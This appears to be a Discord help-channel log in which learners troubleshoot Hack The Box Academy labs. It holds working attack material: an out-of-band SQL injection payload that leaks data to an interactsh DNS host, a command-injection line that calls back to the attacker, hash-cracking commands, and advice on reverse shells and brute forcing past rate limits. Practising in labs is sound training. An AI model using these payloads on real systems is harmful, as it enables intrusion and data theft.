#modules
oh ya i know but its a ctf
wouldn't it make more sense to ask in the thm server?
Regardless, tryhackme has a discord for questions.
i got muted
i know
why

was it for asking in locations you weren't supposed to be asking in? like asking thm questions in htb module chat?
xd no idea
"no idea"
doubt
considering the quality of his messages i presume he might genuinely not know
what are you talking about
I had him blocked and I don't remember why lol
because you dont like me
I think he was the only person I have blocked
this is still offtopic and you haven't gotten the hint yet @rustic sage
verify your account with #welcome and access the rest of the discord
i got it by An00bRektn
then maybe someone will help in a more relevant channel
give me a example

oh my god
theres no example to give, these are instructions
yea now I understand why 
cause right now youre just spamming this channel
you need to verify your hackthebox account so that you can get access to the rest of the discord's channels & ask your question in a more suitable channel
#welcome contains the information we are trying to give you
It helps to understand a server if you read its #welcome channel
he joined the server 3 months ago
i'll later, i'm busy all day
i did already ????
not busy to talk shits
No you didn't, otherwise you would know what we're talking about on how to verify
At least ask in #1024429874246590575 as that's the only other channel you'll have access to until you verify, following the instructions in #welcome
i know how to verify but i didn't verify it and i have read it
i know
not rn im busy
ahaha
Then go do what you're busy with and stop chatting here
i do already
If you do already then do what you didnt do so you don't have to do it already

hm
U get my drift?
because im always high
<@&861185840277487616>
spamming, and posting intoxicated
read thru his history, bro is either genuinely having trouble with english and google translating everything or high on weed
Can we please keep this channel on topic
hello guys, any help would be appreciated. I ran this command, sudo john-the-ripper.keepass2john L||xxxxx.xxxx|| > logins.hash, and when I run this other John command, john --wordlist=~/Documents/HTB/Academy/PasswordAttack/mut_password.list logins.hash, I always receive this error message: No password hashes loaded (see FAQ)
wth
I mean where is the kdbx file xd
u just have to run keepass2john file.kdbx > file.hash
john file.hash --wordlist=/path/to/wordlist
hm let me try it
it's locally on my pc
need sanity check for last question on Active Directory - DCSync 
Just finished https://academy.hackthebox.com/module/158/section/1441
That said, during the module I was having issues finding the other hosts as I moved through things. The previous modules suggest using a one-liner for powershell (posted below) to enumerate - but it was giving me false negatives. Was hoping someone might be able to point me in the right direction for what I should have been doing there:
1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.16.6.$($_) -quiet)"}
I would imagine you fail a sanity test if you're that far along 🙂 but... do you have a question on it?
I think I retrieved the hash for the last question but HTB doesn't seem to accept it
what section is it in which module?
Active Directory Enumeration & Attacks - DCSync
ok, I got you I think. submit the last part after : not the whole hash
you saved my day
I have been there... glad to help.
I have also gotten false negatives with this in the past, I don’t really have any other suggestions other than trying more than one tool/one-liner
Check the arp table, write your own portscanner to run from Windows, etc.
Yeah, that's what I ended up doing. I was just curious if it's known to be inconsistent, and if there's a reason why (timeouts or something) that I'm not aware of. Thanks for the advice though @trail leaf - always appreciated 🙏
If you think through the parts of the one liner, you’re basically sending a single ping packet to each target and checking if you get a response back
Sometimes hosts are configured to not respond to ping, other times the connection is just unstable
send the command
I'm not able to crack the file password with john or even hashcat
well, with keepass2john file.kdbx > file.hash I'm extracting the hash but, when I try to crack it, that is the issue
hashcat -m 13400 -a 0 logins.hash ~/Documents/HTB/Academy/PasswordAttack/mut_password.list
I got [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q & if I choose [c] | [f] or [q] the password shown is not working
let me replicate the issue with john
not sure if u kidding me
no man, I'm not kidding you, why would I kid you?
what section are you working on?/Module?
Lab Hard | Password Attacks
john file.hash --wordlist=/path/to/wordlist
.
and u don't need to touch anything in hashcat
```
$ keepass2john Logins.kdbx > logins.hash
$ cat logins.hash
Logins:$keepass$2600000048f742ba4e....SNIP....d9a764d7b5d4e3610e1a021be2f2f1018523c065
$ /usr/sbin/john logins.hash --wordlist=~/Documents/HTB/Academy/PasswordAttack/mut_password.list
No password hashes loaded (see FAQ)
```
those are the options of the menu while cracking
did you try john --wordlist=~/Documents/HTB/Academy/PasswordAttack/mut_password.list logins.hash
how did you create the hash file? that command should work fine
keepass2john Logins.kdbx > logins.hash
Can you show the response when you didn't type anything?
I mean not "q" or "f" etc
ok.
give me a couple of secs, I'm trying to replicate everything from a Kali VM that I have
well if I use ubuntu I get the same error, but in Kali it works fine
it's not going anywhere
It didn't complete
that's what I thought today
Just wait
Did you try to do it in pwnbox?
Also -S isn't needed
in a couple of minutes my computer will be landing off..... LoL
You have to wait
not yet, I will try
Have you tried also using john
yup
Keepass2john. Then John hash --wordlist
¯\_(ツ)_/¯
I had no issues with it tbh
Following that line *
I will start with a clean slate
hmm could be
Password Attacks
Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.
- I gained initial access via SSH using Kira's account after altering the password as indicated in the hint.
- I located a directory containing the files passwd.bak and shadow.bak.
- I successfully transferred one of the files to my attack host using the command `cat passwd.bak | base64 -w 0; echo` and subsequently decoded its contents.
- However, I encountered difficulties while attempting to transfer shadow.bak. Is it essential to have this file to proceed with cracking the hash?
I would greatly appreciate a hint. Thank you.
shadow is the important one, passwd is if you want to be extra and have a nice unshadowed file
^
Yeah thanks, was just having issues trying to transfer it, any ideas?
is it normal for me to only be able to post in the HTB: Academy section?
ok, it was downloaded correctly and I'm just waiting for hashcat to crack the password, I'm fuxxing desperate, ty y'all
try literally any other method if base64 is being troublesome for you
HTTP, SMB, FTP, SCP, etc.
DNS why not
glad you got it! I could never get hashcat to work with it, kept getting salt errors
well hashcat works in my pc unfortunately john doesn't
Damn that's rough
where can we discuss about the boxes?
Newly released boxes have their own channel. For older ones, #boxes.
okay thanks!
Has anyone done the Web Attacks assessment and available for a DM? I've made it into the admin account and know the vector to the flag, but no matter my payload, the server just hangs.
if you are still having issues with john/hashcat, feel free to ping me
though in your screenshot, hashcat appears to be working fine
the issue with* john could just be a format detection issue
If they used keepass2john, the generated hash should work
yeah, it looks like it was just unhappy loading it automatically
specifying the format would probably pick it up or at least expose any underlying issues
like an outdated version would just give "invalid format" or similar
It just looks like their command was off
Try it without the XML declaration (version, encoding, etc.)
Yeah, i've managed to try that one. I can declare just a string entity and reference it in the payload and get an output. But as soon as I add SYSTEM and try to read a file, the request just times out
DM is probably better. Feel free.
Can anyone who has done the attacking common services module (DNS) DM me? I am desperate
Are you specifying the ip?
hello bro can you help me more about passphrase or password for bitlocker?
bitlocker2john iirc
so the command will be
bitlocker2john Backup.vhd > hash do i understand correct?
Something like that yeah
I know it's been a bit, do you need help still?
I recommend naming your hashes when you do that kinda thing
thank you very much bro
Hey i'm doing the module "Windows Priv Escalation" and i'm on the page "DnsAdmins", i've completed the steps to add myself to the domain admin group, and have logged in and logged out, and run gpupdate /force. I'm still unable to get into the Admin folder for the flag, or run any of the RegEdit commands to clean up. Any help here would be much appreciated.
you can DM me.
Thanks i'll DM you
Hi there, can anyone help with Introduction to NoSQL Injection, skill assessment 2? I just found a username but have no idea which endpoint, /reset, /forgot or /login, is vulnerable
I thought it's login because it's the only one where I can generate 500 errors using NoSQLi payloads.
thanks in advance
Look closely at the answer. Pay attention to the dot
has there been any news about the completion of the SOC analyst path?
i know a new box was added yesterday, just curious to see if there are any updates
Has someone done intranet database penetration? I can't solve it, please advise
Hi, I identified that I can inject some time-based payload and effectively cause a delay in the application, but what structure of the query should I use to make boolean questions?
I need it too, can I message you privately?
Think about what data you want to have. You have found the vulnerable field
can i dm you?
I don't have notes on that section, yet... so it would be better to just ask your question here in case someone can help as well.
sure
thanks i will try hard
Is there one for sql I’m new to htb
there are a lot, from beginners to advanced
Okay
What's better, starting with the Bug Bounty Hunter path or the Penetration Tester path?
hey guys
did someone have issues with "ICMP Tunneling with SOCKS" ??
In the server side attacks ssrf section for question "Replicate what you learned in this section to gain code execution on the spawned target, then look for the flag in the root directory and submit the contents as your answer." why can't we just do "curl -i -s http://10.129.212.247/load?q=file:///flag.txt"?
thank U
yo is anybody here like really good at hacking
?
bc i need somebody to take down a roblox game its pretty small
ask roblox discord
You'll get banned here.
Bro has free robux link in nio....
Hey guys, i'm following the whitebox attack and i'm doing the prototype pollution part, i need to run the web server locally using node index.js but when i try to send a request i get no response from the server
what's the output in terminal after running node index.js?
I can't paste it wtf
maybe screenshot?
yeah i can't either
@balmy rivet @dapper flax read #welcome and #rules after that use /verify at #bot-commands to send screenshot here
thx
Hi my name is Oracle
This module is overkill
I cant see my scroll bar
Read a hundred pages so far
I listen on port 1521
And I'm here to have fun
In order for me to see
I need to brute the SID
And you already know that
I will be using ODAT
To upload a shell
Does that ring any bell
WOOOORDD YOOO
Bro just dropped a rap
did chatgpt write that? 🤣
Hi! I'm having trouble completing the module Pivoting, Tunneling, and Port Forwarding, section RDP and SOCKS Tunneling with SocksOverRDP
I added the dll and then I'm trying to connect through rdp but I get this message
any help please?
Who can tell me what to do if I cannot access the intranet server during intranet penetration
i know it's stupid i'm a newbie
ask the administrator of the intranet server
Have you turned off the Real Time Protection?
EDIT: Nvm got it!
hello, i'm new and i'm learning linux fundamentals. question 1 uname -a easy, 2. pwd easy, 3. wtf: What is the path to the htb-student's mail? i don't know the command for this task
Where is the mail kept on a linux system?
@livid pier I don't see it described in the module
on youtube the guy uses cd, cd is on the next page
cd is a command to change your current directory
can i dm someone for Broken Authentication --> Brute Forcing Cookies
you get it?
But yes, this is all hard at first
then after you do it for a while, its still hard
The Footprinting module made my ports notes HUGE
nice, anything in there?
I think today is the day
🎉
I'm finally gonna finish the Footprinting module
They should show examples of each command in use in the tutorial xd
4 next hard question xd
5 and 6 question easy 4 is hard xd
something about shh ?
Which shell is specified for the htb-student user?
dude commend env op
you dont have to put the answers in chat
ok
guys im on module pass attacks section linux pass the ticket
can someone help me understand how chisel and proxy works i dont get it.
also when i set up the whole thing i can't connect from the target to my attack host smb share
Chisel and proxy are tools used for creating network tunnels
ok i got that but does it forward everything that the target receives to me or?
every port is forwarded or ?
Hey i'm trying to do the privesc whitebox prototype pollution module, i'm following everything, used burpsuite to send the payload but it's not polluting anything
hey, in the broken authentication module "Brute Forcing usernames" section. how am i supposed to solve the last exercise with automation?
i got the answer but i tried every username by hand since the list wasnt long
just wondering how should i automate this process
i tried hydra but couldn't get it to work
good day friends, i am at Web attacks chaining idor, i am trying to write a script to enumerate all users, but curl gives me rubbish output, how do i fix that
I'm trying to establish a reverse shell from a Windows machine (target) back to my Pwnbox. I RDPed into the target and launched PowerShell. Back on the Pwnbox, I started a netcat listener on port 443. Then I looked at the "Reverse Shell Cheat Sheet" and saw three payloads I can put into PowerShell to get a reverse shell (the second of those three is recommended in the module section on reverse shells). When I execute the first payload, PowerShell just closes and I don't see any activity back on the PwnBox. The second payload gives me some parse errors (error messages mention expected and unexpected closing brackets/parentheses), and the third payload doesn't work either. I copied and pasted each payload directly into PowerShell and then modified the listening IP address and port number to match my netcat listener on PwnBox. What should I try next?
I am not sure what you're dealing with, but https://www.revshells.com/ has some great shells to try. I have good luck using the PowerShell #3 (base64) on windows boxes.
Anyone finish detecting windows attacks with splunk, detecting golden tickets section?
Epic! That worked perfectly. Popped the shell. That's a great resource. I really appreciate it.
Great! Glad it helped. Yeah bookmark that page, it is a great resource for sure.
That does not ring a bell, which module is it on?
ohhh, I have not done that one yet. Good luck!
yea congrats on completing the new module and best of luck on your SOC Analyst path
I'm really excited to see what other modules are released in this SOC path.
Do other hands on blue team certs exist? What does an exam on such a cert look like? Are you getting locked up for 7 days in a network and have to stop CPTS exam takers from finishing their exam and whoever finishes their goal gets the cert and the other one doesn’t?
Pretty sure no certs exist that are PvP yet.
It'd be funny, but extremely unfair and not at all comparable between attempts
https://www.securityblue.team/why-btl1
https://www.offsec.com/courses/soc-200/
https://www.eccouncil.org/train-certify/certified-soc-analyst-csa/
Blue Team Level 1 is a practical cybersecurity certification focusing on defensive practices, security investigations, and incident handling.
Learn the foundations of cybersecurity defense. SOC-200 is OffSec's Foundational Security Operations and Defensive Analysis course on Security Operations. Earn your OffSec Defense Analyst (OSDA) certification.
24h realistic incident response exam lab sounds interesting... so many fun sounding things in this security field. Does HTB have boxes like that beyond the forensic challenge ones?
Yes, but unfortunately only for business accounts
https://www.hackthebox.com/blog/htb-sherlocks-dedicated-labs
I really hope that these labs will be made available to the community as well.
meh, oh well, I hope it opens up with the new cert to offer more training ground
Yes, I desperately need some experience before I jump into this exam
**Footprinting Lab - Easy**
Question:
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
1. Performed Nmap and found the following services:
```
22 OpenSSH 8.2p1 Ubuntu
53 domain
2121 ProFTPD Server
```
2. Connected to FTP server using provided creds
upon any command other than pwd, I get this response:
```
229 Entering Extended Passive Mode (|||11591|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
```
So I cannot traverse or retrieve data from the ftp server...
3. Tried to connect to SSH service but I get this error:
```
Permission denied (publickey)
```
I know that I must use either the FTP or DNS servers to retrieve the private SSH key to connect to SSH and retrieve the flag. However, I need some help regarding my errors or how I can enumerate the FTP or DNS services better.
Thank you in advance for any help.
Read the sections in the module again. There you will learn everything you need to enumerate DNS or FTP.
I enumerated according to the sections but I found nothing. Here is the command and output for DNS enumeration which I left out by mistake:
dnsenum --dnsserver $IP --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
ns.inlanefreight.htb. 604800 IN A 10.129.34.136
Is there a specific thing I'm missing?
Any one able to give me a hint for:
AD Enumeration & Attacks - Skills Assessment Part I
Q5, trying to get the clear text creds, cant seem to find them
What exactly is DNS for?
I'm working on "Automating Shells and Payloads with Metasploit" in the Shells and Payloads module. I use the same metasploit module mentioned in the HTB module and use the credentials provided by the question. I get a meterpreter session and then type "shell" as recommended in the module to get a session with more features. I'm supposed to find a Documents folder, but I can't find one. I also assumed that Metasploit would log me in as the user whose credentials I provided, but it didn't. I can't figure out how to get a session as that particular user. Any tips?
||CME|| is your friend 😉
have tried using it, but will give it another go
anyone on "Windows Priv Esc -> Attacking the OS -> UAC"? I'm not getting any connection back when running SystemPropertiesAdvanced.exe when the right ".dll" is placed in the PATH where my user has write privileges. Did anyone experience the same behaviour?
Anyone know how to fix mimikatz module not found when trying to run through CME?
Mimikatz works as far as I know only with this version
mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
newer versions do not work.
||CME or lazagne should work||
The second one was not working so attempted to move to the first and getting the error.
If the dll is in the right place and named correctly, then it should work.
Send me the command per DM you used.
Gotta head out now. So will give another go when I get a chance else will do 👍
Anyone who has finished the Pivoting, Tunneling and Port forwarding module can help please? I'm stuck
I'm following the steps as said in the section but it fails when trying to connect from windows to rdp
Is the target not reachable or are the creds wrong?
I remember that I had to use the US VPN servers so that the creds were accepted.
it is in the right place and copy and paste for the name. I'm wondering if the firewall is in between since connection on port 443 doesn't work but checking the rules in outbound is all open. I'll reset the machine just in case
The target is not reachable
I have tried from my kali machine and nothing
Then your tunnel is not built properly.
And now I am trying from the pwnbox and it doesn't work either
Try port 53
This port is in most cases open to the outside 😉
DNS servers are like bookshelves of phone books with names and IPs
Would really appreciate some help sir
and why exactly are you looking for files in it?
But these other ports....
These are FILE transfer protocols.
Im just trying to enumerate everything that is available to me
😉
But as you can see when i try to access the file transfer protocols i get the errors shown above
😉
Hello Guys, i'm struggling with the Password Attacks Hard lab. After successfully mounting the .vhd file, what should I do next? i'm so stuck!!
I do not see any error messages
```
150 Opening ASCII mode data connection for file list
226 Transfer complete
```
This
Take a look at the contents of this backup.
Backups usually contain exciting files.
Files that are locked during operation can be accessed this way.
Why is this an error message?
I don't see what exactly you did, nor do I see what the output is.
Send me a printscreen via dm
Thank u I will send u it soon
I found a SAM and SYSTEM file but dunno what to do next.. It is encrypted also?
"Attacking ColdFusion" Does this have some connection issues? Even with a timeout of 520 seconds I still can't load the page or execute the script
Anything in the skills assessment was likely covered in the module, go back and look through it
On the Foothold PC
What does this command show you?
C:\Users\b-student\Desktop\SocksOverRDP-x64>netstat -antb | findstr 1080
They ported the retired box Arctic to Academy for that one, and it’s extremely slow
can someone help me with the password attacks module hard lab? i am trying to brute force the services available and according to the forum i am on the right path but after 2 hours i still have nothing
Maybe a wrong list?
i am using the list created in the first steps of the module
That should be correct.
the one with all the mutated passwords
I'm always on the point to test the connection with the srrstr.dll and the test connection works. Then I have to exit from rev shell received since I have to run the SystemPropertiesAdvanced.exe which in turns will search for the paths where the malicious dll is stored. Tried to use other binaries that may do the same like SystemPropertiesProtection.exe but nothing...
Oh wow, got the hashes, thanks @trail leaf and @acoustic owl
If your test connection works, it should also work with the malicious dll.
well it doesn't 😂
Send me a DM how you created the dll and the rest of the commands
I’m not there yet so it wont be correct
Can dm you?
sure
hey, in the broken authentication room, "brute forcing passwords" https://academy.hackthebox.com/module/80/section/777. in the exercise there seems to be a rate limit which i can't seem to figure out how to work around
i try hydra but its giving me false positives
would appreciate some help
-38 seconds?
i think i found the rule already
Quwerty
i just cant get past the rate limit
i already did this
how do i brute force with this stupid rate limit that is my question?
when you don't know how grep works, google or chatgpt for this, he is your friend
in burp you can set a timing
wait, i'll take a screenshot
j
restart the module
i did
It just doesnt work at all.
when you use burp
you can use a request pool in intruder
set the time to what the site says
just do a few wrong logins, note how many are needed and how long the wait time is
@verbal kraken
i dont understand
i found it
but i wrote each password by hand
how should i have done it?
this room is frustrating
all of its exercises are frustrating
i need some help please
Find out how many login attempts are allowed and then how long you have to wait.
Then use Burp or write a Python script which executes the bruteforce attack
this would be sending a request every 5 seconds for example?
how do i set this up?
You can use any tool that lets you insert a time delay between tries. I did that one with wfuzz because you can give wfuzz the param -s 10 to delay 10 seconds between each try.
is there a way i can send for example 5 requests then wait 30 seconds then send them again?
im sorry if im being annoying
yes, with python
Yes. In Burp it's super easy. You just need to do some research: https://gprivate.com/66a0r
You want Resource Pools under Intruder
can someone dm me to give me a hint for the password for J?
J what?
well i cant make cme run faster so i cant try harder
well I cannot guess what module are u on 
oh sorry forgot to mention i was talking here earlier, im on the hard lab for password attacks
i have tried hydra and cme for the past 3 hours and still nothing
what port
winrm for cme and rdp for hydra
Try smarter! Try harder! 🎵 Harder, better, faster, smarter! 🎵
I don't think you need a VM for it
But you need to make sure you're using a mutated password list using the provided custom rule
I bruteforced it with cme using smb
I couldn't mount the kdbx in kali
I think payloadbunny was able
Worked fine in pwnbox
ah well I don't use pwnbox
i am using the right wordlist but after going through all the 55 thousand words it still did not find the right password
no you dont
Ive not used a windows VM in the entirety of CPTS
Did you do the thing where you cut the first odd amount of lines to make one of the earlier sections go by faster 🙂
I couldnt remember if that was for that one
Its for like all of them tbh
It isnt, but people will use the same list and then wonder why they cant get the answer 😉
Hrm
So even taking out 17k is in the 70k range
So 55k just seems like used the wrong lists
Point is, use the fresh full mut list for the lab
^
🎵 Harder, better, faster, smarter! 🎵
Ive seen that mistake like 5 times here
heh, if you search for 17000 its mentioned 65 times
nope i figured it out. it appears that i only had half of the passwords i should have had after creating the mutated list, after recreating it it worked
😉

that mistake wasted 3 hours of my time
Like I said, pretty common mistake
anyways thanks for the help
Hi All,
I got a problem with Splunk - Discovery & Enumeration
It's not working on port 8000 and 8089
Idk how to run this to check the version
Am I doing something wrong or maybe machine need more time?
How long did you wait? It can def take a bit of time for it to load up and the port to be opened...
3 min?
main website is working but on those ports "The connection was reset"
nmap also show me those ports
but don't know why it's not working
I'd try restarting the lab then... I've def had cases where things just didn't work, but if you've already done that (esp if multiple times)... then sorry, out of ideas
thanks for help mate
for Windows Privilege Escalation Skill Assesment 1, I'm having trouble getting a reverse shell on the web app. I've|| set up netcat on my kali and I've tried various commands on the webapp line to connect back to the NC (wget, curl) (commands ive used for example: 127.0.0.1 && powershell -c 'curl http://<my tun0>:1234/' I also tried to transfer Invoke-PowershellTCP onto the target but || none seem to work
There are a lot of ways to get a shell but an easy one would be trying ||iex|| and ||wget||
can i dm you?
Sure
So I am struggling on this module: https://academy.hackthebox.com/course/preview/windows-event-logs--finding-evil
Is there anything else I can look at for help? I can't even get past the 1st set of questions. Maybe I am not understanding something. Thank you.
i usually go with uploading nc.exe via certutil and avoid using powershell imo.
hello, 1 qq, under the Password Attacks module | Lab Hard skill assessment, does anyone know why xfreerdp or Remmina doesn't work with the credentials found in the keepass but smbclient does..!!!
Try to see what is in smb.
I found the smb content but, I was wondering why the creds don't work with xfreerdp or Remmina
Because maybe they are not designed to work with that
Not all users that have access to SMB are guaranteed access to RDP and vice versa
What do you mean. ?
I'm having this issue with Linux, I tried every suggestion found on the web with no success....
Send me a dm with issue and little details
python2.7 : Depends: python2.7-minimal (= 2.7.18-13ubuntu1.1) but it is not going to be installed E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).
Did you try running
sudo apt --fix-broken install, and if so, what was the result?
Is it that you can't get your web shell, or you can't get anything onto the box? What shows up on your web log? Does your victim hit your machine?
this is the result:
dpkg: error processing archive /var/cache/apt/archives/python2.7-minimal_2.7.18-13ubuntu1.1_amd64.deb (--unpack):
new python2.7-minimal package pre-installation script subprocess returned error exit status 1
Errors were encountered while processing:
/var/cache/apt/archives/python2.7-minimal_2.7.18-13ubuntu1.1_amd64.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
Based on that, beyond my level of knowledge... I will say that Python2 is highly deprecated... if I were in your shoes, I might look to try and get the script to work in Python3, look for something else, or install an OLD VM that had Python2 support on it... I'd also look into trying to setup a Python virtual environment... Note: I'm sure there's a better/easier/faster way, but those are all literally things I've done because of Python2 being deprecated
@fossil crescent I know Python2 is deprecated but the .py john's scripts unfortunately run in python2.7
You could also try removing (sudo apt-get remove python2.7 [or something along those lines -- can't remember the exact syntax]) and then try reinstalling
that's exactly what I'm trying
In the Getting Started module - Nibbles Privilege Escalation section, I have gotten all the way to where I am trying to run ||monitor.sh|| with the modified code. Every time I try this (after the chmod command listed), it just spits out an error saying:
||ome/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found||
||/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found||
||/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found||
||/home/nibbler/personal/stuff/monitor.sh: 118: /home/nibbler/personal/stuff/monitor.sh: mkfifo/tmp/f: not found||
Any way around this? I've tried resetting the box and it still happens (working in Kali because couldn't get the pwnbox to work on the reverse shell)
Also, my nc terminal window says listening on [any] 8443 ...
10.129.148.70: inverse host lookup failed: Unknown host
connect to [10.10.16.3] from (UNKNOWN) [10.129.148.70] 40588
Hey, so I was doing the Web Attacks assessment and with the ||XXE Injection|| part, the request would always just hang once I added the ||SYSTEM|| command into the ||entity||. After pulling my hair out, I tried it on a different computer/network and it went through and I got the response. After more troubleshooting to figure out what was blocking the request, I found that connecting to a VPN (ExpressVPN) allowed the request to go through from my home network.
Could this be my ISP inspecting and dropping the packets with malicious code? I assume since the website is in the clear, they could easily see the request going through.
If you have this output it should mean it succeeded and you got a root shell
Neither of my terminals (one on target machine and one on local vm) allow me to send commands as root after this…is there something else I should be doing?
You got # as the last line of the nc output, right?
You should be able to type commands directly after that
It went to a new line running as my user@kali-$ immediately
Without allowing me to type commands as root#
can you dm me the content of monitor.sh
I got off my computer, I will after school tomorrow. Sorry for the delay :(
no problem, ask again here tomorrow then
Alright. Thanks!
hey guys, I'm stuck in the hard lab from the Password Attacks module. I already have the .vhd file but I'm not able to mount it!
Not quite sure if the file is protected and, if it is, not sure how to extract the hash either!
any hint would be good appreciate it
since it's a password attack module, did you crack the password?
no, because I don't know how to do it....
I reviewed the module but unfortunately I didn't find anything related to vhd files
unless I'm missing something
i would advise reviewing section Protected Archives. May not involve VHD but you can find similar utilities
sweet
old mate john is pretty good with these kinds of things... just have to find a way to give it 2john
Hi,
In Blind SQL Injection->Out-of-Band DNS
I start interactsh-client, it works well with curl (I receive the requests and subdomains)
In Burp I send this request like in the example to test if it works:
GET GET /api/check-username.php?u=maria'%3bDECLARE+%40T+VARCHAR(1024)%3b+SELECT+%40T%3d(SELECT+1234)%3b+SELECT+*+FROM+fn_trace_gettable('\\'%2b%40T%2b'.blindsqli.academy.htb\x.trc',DEFAULT)%3b--%2b-
I have replaced blindsqli.academy.htb with my DNS but it doesn't work.
Anyone can help me just for the example please
Check the Header
Sorry it's:
GET /api/check-username.php?u=maria'%3bDECLARE+%40T+VARCHAR(1024)%3b+SELECT+%40T%3d(SELECT+1234)%3b+SELECT+*+FROM+fn_trace_gettable('\\'%2b%40T%2b'.blindsqli.academy.htb\x.trc',DEFAULT)%3b--%2b-
It's a paste error
What exactly do you mean by "i have replace"?
You have to make an entry in the DNS zone on the server.
The module describes how to do it
Can someone give me hint on the answer format of this question? DOCUMENTATION & REPORTING > Types of Reports
I replaced it with the DNS name generated by ./interactsh-client
OR with https://app.interactsh.com/#/ like:
GET /api/check-username.php?u=maria'%3bDECLARE+%40T+VARCHAR(1024)%3b+SELECT+%40T%3d(SELECT+1234)%3b+SELECT+*+FROM+fn_trace_gettable('\\'%2b%40T%2b'.ckjrd6c2vtc0000m2z2ggj3cgucyyyyyb.oast.fun\x.trc',DEFAULT)%3b--%2b-
I assume it is “<something> box”
Does it work for you?
Did you make the entry on the DNS server (port 5380)?
No, but now yes and it works 👍
thx
Look again in the module. Especially the chapter Penetration Testing
I have the same problem, any help ?
Yep, damn, you replied to my chat that was 11 days ago
Hey!
I'm currently stuck at "Running SQLMap on an HTTP Request" case 3. Any hints here would be nice
Yes, I did some research 🙂
did you figure it out?
have you solved this?
what's the issue?
Hi everyone!
Currently on Attacking common services - easy section.
Got credentials. Found out where I should upload reverse shell.
But any attempt to create a file causes a MariaDB syntax error (" symbol)
Update: nvm guys, found out a way how to solve it
Me? Hashcat last question of the skill assessment; I already got the most used password but can't crack it
so you got the most used password? just get the most used hash and crack that
guys, when I'm going to do Python, what program should I use?
You can use any text editor for this.
Okay
but i can't
so it just cracks as a basic crack?
if yes, maybe I got the wrong hash
could someone help with "SQLMAP ESSENTIALS" "Running SQLMap on an HTTP Request"? please send me a DM.
would have appreciated it
solved, used the wrong hash type
how do I do the first lesson with the target? what do I do with the IP and port?
Type or copy the IP and port together in Mozilla Firefox (in the VM)
ye it says unable to connect
uhh, can you explain what did you do?
just pasted it into Firefox
in VM?
ye
ye it just says unable to connect
I wanna fix it tho so it doesn't cause further problems
should i?
sure
nothing loads on firefox it all says it timed out
should I get an input field at https://x.x.x.x:xxxxx/case3.php in the "Running SQLMap on an HTTP Request" part of the SQLMap Essentials module?
Ok so I'm working on the File Upload module assessment. I've figured out how to extract information but I'm unsure of how to leverage it all. Can someone please help me?
I need help, I can't connect to the IP and port in Firefox in the workstation
which module are you working on?
I'm working on the Footprinting module labs. Can you please help me?
introduction to academy
whats up there can you explain your problem?
It's quite long so I'll DM you
Pardon these questions as I’m not certain how to phrase them.
When Academy asks me to install tools from git, I’ve been cloning them into my home directory.
My questions are:
Is this best practice, or would an expert store these tools differently?
When there are updates to the repo, how would I ask my machine to update packages cloned from git?
I'm still fairly new, I've only been studying this for 1.5 years, but before I paid the extra for VIP I had a dedicated directory for HTB on my Kali instance. Idk if it's best practice but I felt it helped keep my things more organized.
It looks like using the 'git pull' command will update packages
morning hackers
i'm doing the attacking the common services module
doing the ftp currently
I'm running the medusa command but FTP isn't on the traditional port
Thank you. 🙏🏻
I did -n (port#) at the end of the command but it's still not working. any hints?
use hydra
ok
that is a short way to bypass the problem, because I haven't used medusa, but I'll have a look and see why it isn't working
keep me posted please, I wanted to use medusa
hi, this is supposed to be super easy but I don't get what I am doing wrong:
https://academy.hackthebox.com/module/109/section/1035
I am trying all the formats and URL encoding. I know the answer but why does it keep saying invalid input?
and you know what's crazy, the answer is capitalized for both words, and in the question it's not, it's ridiculous
question out of curiosity, what do people use for notetaking?
that is, taking notes of academy stuff rather than findings doing a box etc
I use Obsidian, I hear cherrytree is another good one
I use Obsidian, and CherryTree for commands. I recently messed up my Kali machine and lost all my notes
so yeah, whatever you put in CherryTree, make sure Obsidian has a backup just in case
what is hack the box?
hey tryhacks01
I messed up my kali before but I was able to recover my Obsidian notes
or can any body advise me to learn cyber security free? @elfin cedar
youtube
@high reef are you able to get to the login screen?
channels?
nope, I messed up my mount. I was able to get into the GRUB menu but I never set the password for my root account
ahhhh
thats what made me setup the obsidian sync thing, well at least the google drive way
what is obsidian?
and HTB?
i think you have landed in the wrong place my friend!
how did you end up here @winged atlas
did you figure out what Obsidian is yet? @winged atlas
nah
i know real obsidian
don't tell me it's a software?
if you're looking to learn cybersecurity for free, this isn't the place
we all have paid memberships
oh
for academy or the machines
HTB discord is free tho
but we are all learning on some path
you know both platform have free content right? 🤣
ok thx mate i think i gotta figure that path by myself
yes but the free stuff isn't as in depth
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
for beginners it's kinda a good thing 😂
i think gonna take cs50 &stanford one
no they have a free course about it
at this day and age of Fing course cs is free 🤣
bro if it's on me i wouldn't be here
cs is boring but hacking is fun but most of the time hell
also some more resource for y'all #modules message
i don't love cs but it's free and maybe who know the future
here is a good resource this guy send me before #resources-tools message
do you have the paid version, how much is it ?
It's free if you install the Google drive desktop app
I have my notes on Windows
Well now I do lol
lol
learned the hardway! still sad i messed up my kali machine
I downloaded Kali Purple, it's super lightweight, storage was only at 26%
started downloading some penetration test stuff and now it's only at 50%
thanks man, appreciated!
You can also use git as a shared backend if you dont want a shared drive style setup
I just have my git repo auto commit changes every 20mins and push changes remotely
I'm working on the PHP webshells exercises, and I've successfully uploaded the White Winter Wolf webshell.php file to the target. But when I try to navigate to https://<target IP>/images/vendor.connect.php as described in the module, I get a 404 not found error instead of access to a web shell. I also tried using Laudanum but that didn't work either. Any ideas?
copy and paste the command @leaden pond so we can see if you uploaded it with the correct syntax
The url I try to navigate to?
the uploaded php webshell
which module and section are you on?
Module: Shells and Payloads, Section: PHP Webshells
i don't think it's a good idea to send his payloads here specifically via discord 🤣 both admin and discord won't be happy 😂
